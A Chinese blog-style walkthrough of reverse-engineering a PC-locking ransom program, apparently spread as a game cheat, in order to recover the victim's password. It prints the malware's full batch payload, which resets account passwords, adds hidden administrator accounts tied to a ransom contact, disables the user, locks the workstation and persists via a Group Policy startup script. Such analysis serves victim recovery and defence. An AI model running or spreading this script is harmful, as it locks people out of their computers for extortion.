关键字:英魂之刃全图辅助_内部定制版前两天有个小弟来求助,说电脑被锁了,并且发来了一个锁电脑的程序。
在虚拟机中测试了下如图。
恢复以前的快照,开始对程序动手用OD载入,查字符串。
像这种锁机程序一般都是用CMD命令对系统帐户进行操作,果然在字符串里面找到了一个“cmd.exe /c”。
跟进去,然后F2下断点,F9运行起来,程序停到断点的地方了。
F7单步运行一下,发现有一个文件路径入栈,是临时目录里面的一个批处理文件。
打开临时目录,设置系统隐藏文件可见,就看到了这个批处理。
查看批处理的内容
[Bash shell]
纯文本查看 复制代码?[tr=none]
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
@shift set opw=lzj_ set rnum=%random% set npw=%opw%%rnum:~-2%%rnum:~-3% net user administrator %npw% & net user Administrator %npw% & net user %username% %npw% & net user 要密码加QQ360665490 %npw% /add & net user aeon%rnum% %npw% /add & net localgroup administrators 要密码加QQ360665490 /add & net localgroup administrators aeon%rnum% /add & net user %username% /active:no & net user 要密码加QQ360665490 /active:yes & net user aeon%rnum% /active:yes & rundll32.exe user32.dll,LockWorkStation & copy %0 C:WindowsSystem32GroupPolicyMachineScriptsStartup /y && echo [Startup]>C:WindowsSystem32GroupPolicyMachineScriptsscripts.ini && echo 0CmdLine=%~nx0>>C:WindowsSystem32GroupPolicyMachineScriptsscripts.ini && echo 0Parameters=>>C:WindowsSystem32GroupPolicyMachineScriptsscripts.ini
到这里,帐户名和密码就已经知道了。密码是“lzj_”加上有一个前缀为“aeon”的帐户后面五位随机数的后两位和后三位。例如随机数是“12345”,则密码为“lzj_45345”
